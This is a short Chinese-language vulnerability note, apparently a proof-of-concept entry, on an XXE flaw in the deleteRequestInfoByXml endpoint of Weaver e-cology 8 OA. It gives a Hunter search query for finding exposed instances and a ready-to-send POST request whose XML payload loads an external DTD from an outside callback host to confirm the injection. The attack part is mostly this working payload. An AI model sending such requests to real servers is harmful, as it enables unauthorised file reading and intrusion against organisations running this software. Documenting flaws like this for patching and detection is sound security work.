登录 白背景
源码

泛微E-cology8 deleteRequestInfoByXml存在XXE漏洞

一、漏洞简介

泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。泛微E-cology8 deleteRequestInfoByXml存在XXE漏洞

二、影响版本

  • 泛微e-cology 8

三、资产测绘

  • hunterapp.name="泛微 e-cology OA"
  • 特征1712765448540-07bfde40-b0c8-435e-91ed-0c005455c3af.png

四、漏洞复现

POST /rest/ofs/deleteRequestInfoByXml HTTP/1.1
Host: 
Content-Type: application/xml
Content-Length: 131

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE syscode SYSTEM "http://hsdtcwwetk.dgrh3.cn">
<M><syscode>&send;</syscode></M>

1722612778773-ca624c0f-13e1-4680-ba05-6727347db59e.png

原文: https://www.yuque.com/xiaokp7/ocvun2/iuuvh8qgmcmupea5